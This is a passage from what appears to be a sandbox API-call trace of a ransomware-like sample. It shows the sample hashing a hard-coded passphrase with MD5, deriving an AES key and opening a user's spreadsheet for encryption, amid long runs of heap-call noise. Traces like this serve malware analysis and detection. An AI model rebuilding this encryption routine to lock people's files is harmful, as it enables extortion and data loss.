lpMsg=0x144ebfc) returned 0 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.646] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.647] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0077.649] CloseHandle (hObject=0x258) returned 1 [0077.649] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.649] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0077.649] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ooKroY8WpRTqCJ.xlsx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c3a9160, ftCreationTime.dwHighDateTime=0x1d5ea19, ftLastAccessTime.dwLowDateTime=0x30900180, ftLastAccessTime.dwHighDateTime=0x1d5e70e, ftLastWriteTime.dwLowDateTime=0x30900180, ftLastWriteTime.dwHighDateTime=0x1d5e70e, nFileSizeHigh=0x0, nFileSizeLow=0x13819, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="ooKroY8WpRTqCJ.xlsx", cAlternateFileName="OOKROY~1.XLS")) returned 0x41ac440 [0077.650] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0077.650] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0077.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0077.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0077.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0077.650] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0077.651] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0077.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.651] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0077.651] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.651] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.651] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca778, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0077.652] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0077.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.652] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0077.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.652] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0077.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca898, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0077.652] CryptHashData (hHash=0x41ac740, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0077.652] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.652] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0077.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca4a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0077.653] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac200) returned 1 [0077.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0077.653] CryptDestroyHash (hHash=0x41ac740) returned 1 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0077.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0077.654] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0077.654] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0077.654] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0077.654] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0077.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.655] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ooKroY8WpRTqCJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\ookroy8wprtqcj.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0077.655] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.655] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0077.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0077.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0077.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0077.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0077.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.663] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0077.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0077.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0077.704] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0077.704] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0077.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0077.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0077.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: 